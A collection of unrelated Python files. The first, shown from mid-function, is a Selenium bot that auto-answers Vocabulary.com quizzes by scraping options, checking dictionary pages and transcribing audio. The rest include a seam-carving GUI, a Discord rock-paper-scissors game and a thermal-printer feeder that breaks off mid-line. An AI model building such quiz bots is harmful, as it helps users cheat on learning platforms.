global op1
global op2
global op3
global op4
global options
global word
global lastAudioLen
try:
html = driver.execute_script("return document.getElementsByTagName('body')[0].innerHTML;")
except Exception as e:
print("Error: " + str(e))
time.sleep(1)
driver.get(url)
source = unidecode(html)
old_html = source
time.sleep(1)
soup = BeautifulSoup(source, "html.parser")
driver.execute_script("function getElementByXpath(path) { return document.evaluate(path, document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue; }; window.getElementByXpath = getElementByXpath;")
try:
c = driver.find_element_by_class_name("wrapper").find_element_by_class_name("instructions").text
if(c == "choose the best picture for"):
driver.get(url)
time.sleep(3)
return 5
except Exception as e:
print "No img detected!"
try:
c = driver.find_element_by_class_name('next')
if(c):
nextQ = driver.find_element_by_class_name('next')
nextQ.click()
time.sleep(1)
return 5
except Exception as e:
eee = str(e)
print "No button detected! "
try:
isAudio = 0
try:
length_check = len(
soup.findAll('div', attrs={'class': 'instructions'})[0].text.split(" "))
if(length_check == 0):
isAudio = 1
except Exception as e:
isAudio = 1
print "AUDIO!"
c_list = driver.execute_script('return document.getElementsByClassName("spellit")') #driver.find_elements_by_class_name('spellit')
len_list = len(c_list) - 1
if(isAudio):
lastAudioLen = len_list - 1
print "AUDIO: " + str(len_list)
print str(c_list)
c = c_list[len_list]
if(c and lastAudioLen != len(c_list)):
print "SPEACH DETECTED! LIST: " + str(len_list)
if(skipAudio):
time.sleep(1)
text_area = driver.find_element_by_class_name('wordspelling')
text_area.send_keys("Life is good (LG)")
time.sleep(1)
try:
c.click()
time.sleep(1)
c.click()
time.sleep(1)
c.click()
time.sleep(1)
element2 = driver.find_element_by_class_name('surrender')
element2.click()
time.sleep(2)
element3 = driver.find_element_by_class_name('next')
element3.click()
time.sleep(1)
element4 = driver.find_element_by_class_name('next')
element4.click()
driver.get(url)
time.sleep(3)
except Exception as e:
a = str(e)
print "Error at: " + a
else:
try:
lastAudioLen = len(c_list)
audio = driver.find_element_by_class_name('playword')
#link_ = driver.execute_script("""return jQuery(".challenge-slide").data().audio;""")
link_ = driver.execute_script("""var list = document.getElementsByClassName("challenge-slide"); var obj = list[list.length - 1]; return jQuery(obj).data().audio;""")
link = ''.join(["https://audio.vocab.com/1.0/us/", link_, ".mp3"])
time.sleep(1)
print link
testfile = urllib.URLopener()
testfile.retrieve(link, "audio.mp3")
print "Downloading..."
time.sleep(2)
text = speech_to_text("audio.mp3")
time.sleep(1)
text_area_list = driver.find_elements_by_class_name('wordspelling')
text_area = text_area_list[len(text_area_list) - 1]
text_area.send_keys(text)
time.sleep(2)
c = c_list[len_list]
c.click()
time.sleep(2)
element4 = driver.find_element_by_class_name('next')
element4.click()
time.sleep(1)
except Exception as e:
a = str(e)
print "Error at: " + a
return 5
except Exception as e:
eee = str(e)
print "No speach detected!"
try:
length_check = len(
soup.findAll('div', attrs={'class': 'instructions'})[0].text.split(" "))
if(length_check != 0):
word = driver.find_element_by_xpath("//strong[1]").text
if(str(word) == ""):
word = driver.find_element_by_class_name("sentence").find_element_by_xpath("//strong[1]").text
dic_exceptions = ['and', 'up', 'as', 'if', 'the', 'who', 'has', 'a', 'an', 'to', 'for', 'from', 'is', 'where', 'when', 'why',
'how', 'which', 'of', 'one', "one's", 'or', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten']
#========================== Options ==========================#
val1 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='1A']").text""")
val2 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='2B']").text""")
val3 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='3C']").text""")
val4 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='4D']").text""")
op1 = (val1 + "\n").rstrip('\n').split(" ")
op2 = (val2 + "\n").rstrip('\n').split(" ")
op3 = (val3 + "\n").rstrip('\n').split(" ")
op4 = (val4 + "\n").rstrip('\n').split(" ")
final = []
options = [op1, op2, op3, op4]
#========================== Options ==========================#
op_st = ''.join(["Options: ", str(options)])
#print op_st
for option in options:
for item in option:
for x in dic_exceptions:
if x == item:
p = option.index(x)
option.pop(p)
#========================== Options Rading ==========================#
s_link = "https://www.vocabulary.com/dictionary/"
link = s_link + word
html = urllib2.urlopen(link)
soup = BeautifulSoup(html, "html.parser")
if(word == "________"):
return 0
source_dic2 = None
print "Word: " + word
try:
test = soup.find('div', {"class" : "definitionsContainer"})
source_dic2 = unidecode(test.prettify())
except Exception as e:
eee = str(e)
print "Error" + eee
return 0
a = 0
rate_arr = []
cpy_rate_arr = []
for option in options:
for item in option:
if item in source_dic2:
a += 1
print ("{0} -> {1}".format(option, a))
rate_arr.append(a)
a = 0
#========================== Options Rading ==========================#
cpy_rate_arr = sorted(rate_arr)
x_pos = cpy_rate_arr[len(cpy_rate_arr) - 1]
x_pos_2 = cpy_rate_arr[len(cpy_rate_arr) - 2]
choice = rate_arr.index(max(rate_arr))
if (x_pos == x_pos_2):
print "No position found."
h = choice
print h
return h
else:
driver.quit
print "Error: length_check is less or equal to 0"
except Exception as e:
print e
def click_op(i):
try:
if(i == 5):
time.sleep(1)
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
return
op = i + 1
ar = ["", "A", "B", "C", "D"]
high = str(op)
b = ''.join([high, ar[op]])
element = driver.find_element_by_xpath('//a[@accesskey="' + b + '"]')
try:
element.click()
except Exception as e:
a = str(e)
print "Error at: " + a
try:
nextQ = driver.find_element_by_class_name('next')
nextQ.click()
except Exception as e:
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
a = str(e)
print "Error quitting... " . a
time.sleep(1)
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
except Exception as e:
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
a = str(e)
print "Error quitting... " . a
#====================================================================================================================================================#
def autoUpdate(): #main()
updated = update("https://raw.githubusercontent.com/lefela4/Vocabulary.com-AutoBot/master/src/vocab_Demo1.py", __version__)
if(updated == 0):
# Nothing to update
main()
elif(updated == 1):
# The file have been updated!
print("Please restart the program!")
elif(updated == 2):
# Error
print("Sorry, an error occurred while preparing the installation. Please go in https://github.com/lefela4/Vocabulary.com-AutoBot/issues and create a new issue with the screen shot of the error!")
autoUpdate()
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import os.path
from scipy.misc import imread
import numpy as np
from PyQt4 import QtCore, QtGui, uic
from seam_carve import seam_carve
Ui_MainWindow, QtBaseClass = uic.loadUiType('./guiwindow.ui')
class Viewer(QtGui.QWidget):
def __init__(self, parent=None):
super(QtGui.QWidget, self).__init__(parent)
self.INIT_IMAGE = np.ones([350, 350, 3], np.uint8) * 255
self.INIT_MASK = np.zeros(self.INIT_IMAGE.shape, np.int8)
self.SAVE_COLOR = np.array([0, 127, 0])
self.DEL_COLOR = np.array([127, 0, 0])
self.setAttribute(QtCore.Qt.WA_StaticContents)
self.image = self.INIT_IMAGE.copy()
self.n_rows = self.INIT_IMAGE.shape[0]
self.n_cols = self.INIT_IMAGE.shape[1]
self.qimage = QtGui.QImage(self.image.data, self.n_cols,
self.n_rows,
QtGui.QImage.Format_Indexed8)
self.mask = self.INIT_MASK.copy()
def paintEvent(self, event):
painter = QtGui.QPainter(self)
rect = event.rect()
painter.drawImage(rect, self.qimage, rect)
def updateImage(self):
expanded_mask = (self.mask == 1)[:, :, np.newaxis] * self.SAVE_COLOR + \
(self.mask == -1)[:, :, np.newaxis] * self.DEL_COLOR
buffer = np.require(self.image + expanded_mask, np.uint8, ['A', 'O', 'C'])
buffer[self.image.astype(np.uint16) + expanded_mask > 255] = 240
self.qimage = QtGui.QImage(buffer.data, self.n_cols, self.n_rows,
buffer.shape[1] * 3, QtGui.QImage.Format_RGB888)
def loadImage(self, img, mask = None):
self.image = img
self.qimage = QtGui.QImage(img.data, img.shape[1], img.shape[0], QtGui.QImage.Format_RGB888)
self.n_rows, self.n_cols, _ = img.shape
self.resize(self.n_cols, self.n_rows)
if mask is None:
self.mask = np.zeros(img.shape[:2], np.int8)
else:
self.mask = mask.copy()
self.updateImage()
self.update()
def clearMask(self):
self.mask.fill(0)
self.updateImage()
self.update()
def changeMask(self, pos, value, radius):
for row_i in range(-radius, radius):
for col_i in range(-radius, radius):
row = pos.y() + row_i
col = pos.x() + col_i
if row >= 0 and row < self.n_rows and \
col >= 0 and col < self.n_cols:
self.mask[row, col] = value
self.updateImage()
self.update()
def handleScaleBtn(self, btn):
# Flags: 1-large/small, 2-up/down, 4-vert/hor
if btn & 4:
mode = 'vertical '
else:
mode = 'horizontal '
if btn & 2:
mode += 'expand'
else:
mode += 'shrink'
image = self.image.copy()
mask = self.mask.copy()
if btn & 1:
seam_count = 10
else:
seam_count = 1
for i in range(seam_count):
image, mask, _ = seam_carve(image, mode, mask=mask)
self.n_rows, self.n_cols, _ = image.shape
self.image = np.require(image, np.uint8, ['A', 'O', 'C'])
if mask is None or not mask.shape == image.shape[:2]:
self.mask = np.zeros([self.n_rows, self.n_cols], np.int8)
else:
self.mask = mask.astype(np.int8).copy()
del image, mask
self.updateImage()
self.update()
self.parent().alignToImage(self.image.shape)
class Gui(QtGui.QMainWindow, Ui_MainWindow):
def __init__(self, cfgpath):
QtGui.QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.configpath = cfgpath
self.paint = Viewer(self)
self.setupUi(self)
self.loadButton.clicked.connect(self.loadImage)
self.maskClearButton.clicked.connect(self.paint.clearMask)
self.brushSizeSB.valueChanged.connect(self.brushSizeChange)
btnlist = [self.horDownBtn, self.horDownLargeBtn, self.horUpBtn, self.horUpLargeBtn,
self.vertDownBtn, self.vertDownLargeBtn, self.vertUpBtn, self.vertUpLargeBtn]
sigmap = QtCore.QSignalMapper(self)
for i in range(len(btnlist)):
self.connect(btnlist[i], QtCore.SIGNAL("clicked()"), sigmap, QtCore.SLOT("map()"))
sigmap.setMapping(btnlist[i], i)
self.connect(sigmap, QtCore.SIGNAL("mapped(int)"), self.paint.handleScaleBtn)
self.alignToImage(self.paint.image.shape)
self.brushsize = self.brushSizeSB.value()
self.imagepath = ''
def mouseMoveEvent(self, event):
ex = event.x() - self.paint.x()
ey = event.y() - self.paint.y()
pos = QtCore.QPoint(ex, ey)
if ex >= 0 and ex < self.paint.width() and \
ey >= 0 and ey < self.paint.height():
if event.buttons() & QtCore.Qt.LeftButton:
if self.brushSaveRB.isChecked():
value = 1
else:
value = -1
self.paint.changeMask(pos, value, self.brushsize)
elif event.buttons() & QtCore.Qt.RightButton:
self.paint.changeMask(pos, 0, self.brushsize)
return QtGui.QMainWindow.mouseMoveEvent(self, event)
def mousePressEvent(self, event):
return self.mouseMoveEvent(event)
def alignToImage(self, shape):
self.resize(shape[1] + self.controlFrame.width(), shape[0])
self.paint.setGeometry(self.controlFrame.width(), 0, shape[1], shape[0])
self.controlFrame.setGeometry(0, 0, self.controlFrame.width(), shape[0])
def brushSizeChange(self):
self.brushsize = self.brushSizeSB.value()
def loadImage(self, filename=''):
if type(filename) != str or filename == '':
filename = QtGui.QFileDialog.getOpenFileName(self, 'Open file',
QtCore.QDir.currentPath())
if filename != '':
img = imread(filename)
self.alignToImage(img.shape)
fname,fext = os.path.splitext(filename)
maskpath = fname+'_mask'+fext
mask = None
if os.path.isfile(maskpath):
mask_img = imread(maskpath)
if (np.array_equal(mask_img.shape[:2],img.shape[:2])):
mask = ((mask_img[:,:,0]!=0)*(-1) + (mask_img[:,:,1]!=0)).astype(np.int8)
self.paint.loadImage(img,mask)
self.imagepath = filename
def loadParams(self, params):
if params[0] != '' and os.path.isfile(params[0]):
self.loadImage(params[0])
self.brushsize = params[1]
self.brushSizeSB.setValue(params[1])
def saveParams(self):
params = (self.imagepath, self.brushsize)
saveConfig(self.configpath, params)
def loadConfig(filename):
with open(filename) as fhandle:
for line in fhandle:
if len(line) != 0 and line[0] != '#':
if line[:6] == 'image=':
imgpath = line[6:].rstrip()
elif line[:6] == 'brush=':
bsize = int(line[6:])
return (imgpath, bsize)
def saveConfig(filename, params):
with open(filename, 'w') as fhandle:
print('image=%s\nbrush=%d' % params, file=fhandle)
app = QtGui.QApplication.instance()
if not app:
app = QtGui.QApplication(sys.argv)
app.aboutToQuit.connect(app.deleteLater)
configpath = os.path.dirname(os.path.abspath(__file__)) + '/gui.config'
window = Gui(configpath)
app.aboutToQuit.connect(window.saveParams)
window.show()
if os.path.isfile(configpath):
params = loadConfig(configpath)
window.loadParams(params)
if len(sys.argv) > 1:
window.loadImage(sys.argv[1])
app.exec_()
|
import torch
from functions import create_model
class Checkpoint:
def __init__(self, model_state_dict, class_to_idx, arch, hidden_units):
self.model_state_dict = model_state_dict
self.class_to_idx = class_to_idx
self.architecture = arch
self.hidden_units = hidden_units
def save_checkpoint(model, class_to_idx, save_directory, arch, hidden_units):
checkpoint = Checkpoint(model.state_dict(), class_to_idx, arch, hidden_units)
torch.save(checkpoint, save_directory)
def load_checkpoint(checkpoint_directory):
checkpoint = torch.load(checkpoint_directory)
model = create_model(checkpoint.architecture, checkpoint.hidden_units)
model.load_state_dict(checkpoint.model_state_dict)
model.class_to_idx = checkpoint.class_to_idx
return model
|
# Copyright 2013-2016 Luc Saffre
# License: BSD (see file COPYING for details)
"""
This is used by tests/__init__.py
"""
from .settings import *
class Site(Site):
languages = 'en de fr et nl pt-br es'
project_name = 'lino_std'
SITE = Site(globals())
"""
This Site instance will normally be replaced by an instance
in a local settings.py file
"""
|
"""
Módulo para funciones auxiliares del juego 'Piedra, Papel o Tijeras'.
"""
from random import choice
from time import sleep
from typing import Optional
from discord import Interaction
from ..archivos import DiccionarioStats, cargar_json, guardar_json
from ..constantes import PROPERTIES_PATH
from .condicion_partida import Condicion
def decidir_partida_ppt(eleccion: str,
victoria: str,
derrota: str,
empate: str) -> Optional[Condicion]:
"""
Decide el resultado de una partida de 'Piedra, Papel o Tijeras'.
Si 'eleccion' es igual que 'victoria', entonces se devuelve un '0'
Si 'eleccion' es igual que 'derrota', entonces se devuelve un '1'.
Si 'eleccion' es igual que 'empate', entonces se devuelve un '2'.
Si no es igual que ninguna, se devuelve 'None'.
"""
condicion_victoria = None
if eleccion == victoria:
condicion_victoria = Condicion.VICTORIA
elif eleccion == derrota:
condicion_victoria = Condicion.DERROTA
elif eleccion == empate:
condicion_victoria = Condicion.EMPATE
return condicion_victoria
async def jugar_partida_ppt(eleccion: str,
author_id: str,
stats_juego: DiccionarioStats,
interaction: Interaction) -> None:
"""
Juega una partida de 'Piedra, Papel o Tijeras'.
"""
opciones = ("PIEDRA", "PAPEL", "TIJERAS")
eleccion = eleccion.upper()
opcion_elegida = choice(opciones)
piedra, papel, tijeras = opciones
msg = (interaction.message if interaction.message is not None else None)
contenido_mensaje = f"¡Yo elegí `{opcion_elegida}`!"
if msg is not None and msg.components:
mensaje_partida = await msg.edit(content=contenido_mensaje,
view=None)
else:
mensaje_partida = await interaction.channel.send(content=contenido_mensaje)
sleep(2.0) # suspenso...
stats_jugador = stats_juego.get(author_id, [0, 0, 0])
match eleccion:
case "PIEDRA":
cond_partida = decidir_partida_ppt(opcion_elegida, tijeras, papel, piedra)
case "PAPEL":
cond_partida = decidir_partida_ppt(opcion_elegida, piedra, tijeras, papel)
case "TIJERAS":
cond_partida = decidir_partida_ppt(opcion_elegida, papel, piedra, tijeras)
case _:
cond_partida = None
if cond_partida is not None:
stats_jugador[cond_partida.value] += 1
stats_juego[author_id] = stats_jugador
propiedades = cargar_json(PROPERTIES_PATH)
propiedades["stats_ppt"] = stats_juego
guardar_json(propiedades, PROPERTIES_PATH)
contenido = None
match cond_partida:
case Condicion.VICTORIA:
contenido = "**¡Me ganaste!** ¡No, exijo otra!"
case Condicion.DERROTA:
contenido = "**¡Te gané!** ¡Tomá!"
case Condicion.EMPATE:
contenido = "**¡Es empate!**\n\n¿...pará, empate? ¡Otra!"
victorias, derrotas, empates = stats_jugador
aviso_stats = (f"**Con esto,** llevás `{victorias}` Victorias, `{derrotas}` Derrotas " +
f"y `{empates}` Empates.")
await mensaje_partida.edit(content=f"Vos elegiste `{eleccion}` y yo `{opcion_elegida}`:" +
f"\n\n{contenido}\n\n{aviso_stats}",
delete_after=10.0,
view=None)
|
from unittest import TestCase
from tree_node import TreeNode
from unique_binary_search_trees_two import Solution
class TestUniqueBinarySearchTreesTwo(TestCase):
def test_zero(self):
self.assertEqual(
[],
Solution().generateTrees(0)
)
def test_one(self):
self.assertEqual(
[TreeNode(1)],
Solution().generateTrees(1)
)
def test_two(self):
first_tree = TreeNode(1)
first_tree.right = TreeNode(2)
second_tree = TreeNode(2)
second_tree.left = TreeNode(1)
self.assertEqual(
[first_tree, second_tree],
Solution().generateTrees(2)
)
|
import anvil.facebook.auth
import anvil.google.auth, anvil.google.drive
from anvil.google.drive import app_files
import anvil.microsoft.auth
import anvil.users
import anvil.server
import anvil.tables as tables
import anvil.tables.query as q
from anvil.tables import app_tables
from .section import section
from .markdown import markdown
from .chart import chart
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from os.path import dirname, realpath, sep, pardir
import sys
import qrcode
from io import BytesIO
import time
import urllib2 # In python3 this is just urllib
from StringIO import StringIO
import json
from datetime import datetime
from PIL import ImageFont, ImageDraw, Image
from escpos.printer import Serial, Usb
"""Feeder for the hamsterPrinter a SoMe etc. POS printer"""
class hamster:
"""Basic stuff like reading the cfg and other common stuff"""
def readConfig(self, cfg='hamsterPrinter.cfg'):
"""Write newlines and optional cut paper"""
from configparser import ConfigParser
parser = ConfigParser()
parser.read(cfg)
return parser
def pinAgain(self, weatherType, dbObj, chuteLengthPx, cfg):
"""Function to check if a "pinned" message/whatever should be printed again"""
printFeeds = [ i.lower() for i in cfg.get('printer', 'printFeeds').split()]
printout = []
# If the printer is too much behind we wait with the pinning
try:
dbWeather = dbObj.cursor()
dbWeather.execute("""SELECT srcType.shortName, printout.height
FROM printout INNER JOIN srcType
ON srcType.id = printout.srcType
ORDER BY printout.id DESC LIMIT 100""")
px=0
while True:
try:
row = dbWeather.fetchone()
# If there are no more rows to fetch
if row == None:
break
srcType, height = row
# Only include sources that are active on the printer
if srcType.lower() not in printFeeds and 'all' not in printFeeds:
continue
if height is None:
print("""The printer is behind with its printing. Waiting with pinning message of type %s""" % weatherType)
return False
else:
px += height
if px > chuteLengthPx:
# We have fetched enough now
break
printout.append({"srcType": srcType, "height": height})
except Exception, e:
print(e)
break
dbWeather.close()
except Exception, e:
print(e)
pass
# Find out if it is about time to print something new
aboutTime = True
for p in printout:
if p['srcType'] == weatherType:
aboutTime = False
# If nothing has been printed yet
if len(printout) is 0:
print printout
print "Nothing has been printed by the printer so we are not pinning anything yet."
aboutTime = False
if aboutTime:
print """The pinned message of type %s has been swapped out of the chute. Lets add it again!""" % weatherType
return True
else:
return False
class printout:
"""Print stuff from Twitter"""
def __init__(self, printerConf):
self.p = Serial(devfile=printerConf['dev'],
baudrate=[int(printerConf['baudrate']) if 'baudrate' in printerConf else 9600][0])
self.p.open()
self.printerWidth = printerConf['printerWidth']
self.basedir = dirname(realpath(__file__)) + sep + pardir + sep
self.printerConf = printerConf
def imBox(self, width, height):
"""Create a white rectangle"""
img = Image.new("1", (width, height))
draw = ImageDraw.Draw(img)
bgColor=255
draw.rectangle((0,0) + img.size,fill=bgColor)
return img
def imText(self, text, align="left",
textSize=None, rotate=None, bgColor=255, fontColor=0, scale=None,
leading=0.25, txtWidth=None):
"""Render an image using a truetype font. Text may be be a list of string
objects (one object per line). If a line is too wide the function will try to line wrap.
Arg. 'leading' is the interline spacing in as a proportion of the height of a line.
Arg. 'scale' is the proportion of the width of the paper."""
if not textSize:
textSize = int(self.printerConf['textSize'])
if not txtWidth:
txtWidth = self.printerConf['printerWidth']
font = ImageFont.truetype(self.printerConf['fontFile'], textSize)
def splitList(txtWidth, txtList, font, newlineSplitOnly=False):
"""Each str/unicode in txtList equals one line when printet. Split at newlines and furthermore split if a line is too wide."""
# First of search for newlines and split the list if a newline is found
withoutNewlines = []
for txt in txtList:
withoutNewlines.extend(txt.split("\n"))
txtList = withoutNewlines
if newlineSplitOnly:
return txtList
txtListWrapped = []
for txt in txtList:
# If the whole line is too wide, remove words until we are good
if font.getsize(txt)[0] > txtWidth:
txtLen = len(txt)
for i in range(txtLen)[::-1]:
if font.getsize(txt[:i+1])[0] <= txtWidth:
whitespaceEtc = [ " ", "\t", "-" ]
if txt[i] in whitespaceEtc:
txtSplit = [ txt[:i+1].rstrip(), txt[i+1:] ]
if font.getsize(txtSplit[1])[0] > txtWidth:
txtSplit = splitList(txtWidth, txtSplit, font)
break
else:
break
# If there are no whitespaces etc. then split the word
elif not any(w in txt[:i+1] for w in whitespaceEtc):
if font.getsize(txt[:i+1]+"-")[0] <= txtWidth:
txtSplit = [ txt[:i+1].rstrip()+"-", txt[i+1:] ]
if font.getsize(txtSplit[1])[0] > txtWidth:
txtSplit = splitList(txtWidth, txtSplit, font)
break
else:
break
else:
continue
else:
txtSplit = [ txt ]
txtListWrapped.extend(txtSplit)
return txtListWrapped
# If txtList is a simple string make it a list
if type(text) is list:
txtList = text
else:
txtList = [ text ]
# Spacing between lines as a proportion of the width of a danish letter for the current text size.
leadingDots = int(font.getsize(u"Å")[0]*leading)
if rotate in [ 90, 270 ]:
# Don't wrap lines based on width when turned 90 or 270 degrees
txtList = splitList(txtWidth, txtList, font, newlineSplitOnly=True)
else:
# Do wordwrapping etc.
txtList = splitList(txtWidth, txtList, font)
# Determine the size of the resulting text image
size = [0,0]
lineHeight = font.getsize("a")[1]
size = [ 0, ( leadingDots + lineHeight ) * len(txtList) + leadingDots]
# Find the width
if rotate is 180:
# Avoid right alignment of rotated text, if a line is less wide than the paper / printerConf['printerWidth']
size[0] = self.printerConf['printerWidth']
else:
for txt in txtList:
maxWidth = font.getsize(txt)[0]
if maxWidth > size[0]:
size[0] = maxWidth
# Create the actual image containing the text
img = Image.new("1",size)
draw = ImageDraw.Draw(img)
draw.rectangle((0,0) + img.size,fill=bgColor)
pointer = [0, 0]
# For each line..
for txt in txtList:
txtPxWidth = font.getsize(txt)[0]
if align == "left":
pointer[0] = 0
elif align == "right":
pointer[0] = size[0] - txtPxWidth
elif align == "center":
pointer[0] = (size[0] - txtPxWidth)/2
draw.text(pointer, txt, font=font, fill=fontColor)
pointer[1] += lineHeight + leadingDots
if rotate:
angles = [0, 90, 180, 270]
if rotate in angles:
img = img.rotate(rotate, expand=True)
else:
raise ValueError("rotate must be part of %s if set " % str(angles))
if rotate in [90, 270]:
if img.size[0] > self.printerConf['printerWidth'] and not scale:
raise Exception("The textSize is too large to print. Use either a smaller textSize or the scale parameter")
else:
if img.size[0] > self.printerConf['printerWidth']:
raise Exception("Could not print the text. One or more lines are too wide. Did you choose a very large font?")
if align is not "left":
imgOld = img
img = Image.new("1",(txtWidth,imgOld.size[1]))
draw = ImageDraw.Draw(img)
draw.rectangle((0,0) + img.size,fill=bgColor)
pointer = [0, 0]
if align is "center":
i = 2
else:
i = 1
img.paste(imgOld,((txtWidth-imgOld.size[0])/i,0))
return img
def printLine(self, pxWidth=False, width=1.0, pxThickness=4, pxHeading=10, pxTrailing=10):
"""Prints a horisontal line.
If width is set then pxWidth is ignored. width higher than 1.0 is ignored."""
# calculate dimensions
if not pxWidth:
pxWidth = int(self.printerConf['printerWidth'] * width)
pxHeight = pxHeading + pxThickness + pxTrailing
img = Image.new("1", (self.printerConf['printerWidth'], pxHeight))
draw = ImageDraw.Draw(img)
draw.rectangle((0,0,self.printerConf['printerWidth'], pxHeight), fill=255)
draw.rectangle(((self.printerConf['printerWidth'] - pxWidth)/2,pxHeading,
(self.printerConf['printerWidth'] - pxWidth)/2 + pxWidth,pxHeading+pxThickness), fill=0)
return img
def combinePILObjects(self, imgArray, doPrint=True, multiCol=False, ignoreRotate=False):
"""Combine objects and print them"""
if multiCol:
# Multiple columns object (e.g. printing wearther forecast). imgArray is then an array of arrays.
imArray = [ self.combinePILObjects(i, doPrint=False, ignoreRotate=True) for i in imgArray]
# Determine height pre multicol
orgMaxHeight=0
for im in imArray:
h = im[0].size[1]
if h > orgMaxHeight:
orgMaxHeight = h
numCols = len(imArray)
imgMaster = self.imBox(self.printerConf['printerWidth'], orgMaxHeight/numCols)
# Paste the columns together
offset = 0
numCols = len(imArray)
colWidth = self.printerConf['printerWidth'] / numCols
for i in imArray:
imgMaster.paste(i[0].resize([colWidth, int(i[0].size[1]*1./numCols)]),(offset,0))
offset += colWidth
else:
# Calculate height
height = 0
imgTooWide=False
for i in range(len(imgArray)):
img = imgArray[i]
# If an image is too large
if img.size[0] > self.printerConf['printerWidth']:
# resize image
imgArray[i] = img.resize([self.printerConf['printerWidth'],
int(img.size[1]*float(self.printerConf['printerWidth'])/img.size[0])])
height += imgArray[i].size[1]
# Create
imgMaster = self.imBox(self.printerConf['printerWidth'], height)
offset = 0
for img in imgArray:
imgMaster.paste(img,(0,offset))
offset += img.size[1]
if self.printerConf['rotate'] and not ignoreRotate:
imgMaster = imgMaster.rotate(180)
height = imgMaster.size[1]
bytes_io = BytesIO()
imgMaster.save(bytes_io, format="PNG")
bytes_io.seek(0)
imgData = bytes_io.read()
if doPrint:
bytes_io.seek(0)
self.p.image(bytes_io, impl=self.printerConf['printType'])
# return: PIL-object, height (int), PNG-file
return(imgMaster, height, imgData)
def qrIcon(self, url, size=120):
iconHeight = size
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_M,
box_size=10,
border=4,
)
qr.add_data(url)
qr.make(fit=True)
img = qr.make_image()
return img.resize((iconHeight,iconHeight))
def commonPrint(self, conn, srcType):
try:
dbPrinter = conn.cursor()
dbPrinter.execute("""SELECT printout.id, printout.jdoc
FROM printout INNER JOIN srcType
ON srcType.id = printout.srcType
WHERE srcType.shortName = %s AND printed = 0
ORDER BY printout.id ASC LIMIT 1""", (srcType,))
row = dbPrinter.fetchone()
# if there is something unprinted waiting for us for the given srcType
if row is not None:
data = json.loads(row[1])
printFunc = getattr(self, srcType.lower())
printData = printFunc(data)
# Hmm. one could argue that if printing something fails,
# then the message should not be marked as printed in the db..
dbPrinter.execute("""UPDATE printout SET height = %s,
printed = 1, printedImg = _binary %s, printedImgRotated = %s,
printedImgMimeType = %s WHERE id=%s""", (str(printData[0]),
printData[1], str(printData[2]),
printData[3], str(row[0])))
dbPrinter.close()
except Exception, e:
print(e)
try:
print("The id for the failed message in the printout table: %i" % row[0])
except:
pass
else:
if row is not None:
if srcType is "Twitter":
print("Printed a twitter message from %s to the printer".encode('utf-8') % data['screen_name'])
if srcType is "WeatherCurrent":
print("Printed a WeatherCurrent message")
if srcType is "WeatherForecast":
print("Printed a WeatherForecast message")
def twitter(self, twitterData):
"""Construct image with the tweet and print it"""
# Create an array of PIL objects
imgArray = []
iconHeight = 120
imgQR = self.qrIcon(twitterData['url'], size=iconHeight)
imgTwit = Image.open(dirname(realpath(__file__)) + sep + pardir + sep +
"/artwork/SoMe/agata/twitter.png").convert("1")
imgTwit = imgTwit.resize([iconHeight-2*4,iconHeight-2*4]) # QR has a border of 4
#headTxt = "%s @%s %s\n%s" % (twitterData['name'], twitterData['screen_name'],
# [ "retweeted" if twitterData['retweet'] else "tweeted"][0], twitterData['created_at'][:-3])
headTxt = "%s %s\n%s" % (twitterData['name'],
[ "retweeted" if twitterData['retweet'] else "tweeted"][0], twitterData['created_at'][:-3])
imHeadTxtWidth = self.printerConf['printerWidth'] - 2*iconHeight - 2 - 12
# Insert PIL w text
imHeadTxt = self.imText(headTxt, txtWidth=imHeadTxtWidth)
imHeader = self.imBox(self.printerConf['printerWidth'],
[ imHeadTxt.size[1] if imHeadTxt.size[1] > iconHeight else iconHeight][0]+4+9)
# Paste them together
imHeader.paste(imgTwit,(0,4))
imHeader.paste(imHeadTxt,(iconHeight+12,4))
imHeader.paste(imgQR,(iconHeight+2+imHeadTxtWidth+2,0))
imgArray.append(imHeader)
imgArray.append(self.imText(twitterData['text']))
# Add images
for url in twitterData['urlPics']:
try:
url = urllib2.urlopen(url, timeout=10)
f = StringIO()
responseIO = StringIO(url.read())
im = Image.open(responseIO).convert("1")
imgArray.append(self.imBox(self.printerConf['printerWidth'], 10))
imgArray.append(im)
imgArray.append(self.imBox(self.printerConf['printerWidth'], 10))
except Exception, e:
print(e)
errorText = "Hrmpf... Failed to download picture from Twitter at print time. See the log for details."
imgArray.append(self.imText(errorText, bgColor=0, fontColor=255))
imgArray.append(self.printLine())
# print it
imgMaster, height, imgData = self.combinePILObjects(imgArray)
return (height, imgData, [0 if not self.printerConf['rotate'] else 1][0], "image/png")
def weatherCloud(self, weatherData, dayType, widthDiv=1.3):
basedir=self.basedir + "artwork/weather/georg"
if dayType == "current":
dayOrNight = [ "day" if weatherData['current']['is_day'] is 1 else "night"][0]
else:
dayOrNight = "day"
try:
filePath = "%s/%s/%s.png" % (basedir,dayOrNight,weatherData[dayType]['condition']['code'])
im = Image.open(filePath,'r').convert("1")
except:
try:
filePathUnknown = "%s/%s/unknown.png" % (basedir,dayOrNight)
im = Image.open(filePathUnknown,'r').convert("1")
except Exception, e:
print "Hmm. It seems we could not read %s or %s in the same folder" % (filePath, filePathUnknown)
print(e)
raise
imWidth=int(self.printerConf['printerWidth']/widthDiv)
im = im.resize([imWidth,int(float(imWidth)/im.size[0]*im.size[1])])
imCloud = self.imBox(self.printerConf['printerWidth'], im.size[0])
imCloud.paste(im,((self.printerConf['printerWidth']-imWidth)/2,0))
return imCloud
def weathercurrent(self, weatherData):
imgArray = []
imgArray.append(self.imText('Current weather', align="center", textSize=60))
imgArray.append(self.imText("%s %s" %
(weatherData['current']['last_updated'],
weatherData['location']['name']) , align="center"))
imCloud = self.weatherCloud(weatherData, 'current')
imgArray.append(imCloud)
imgArray.append(self.imText(
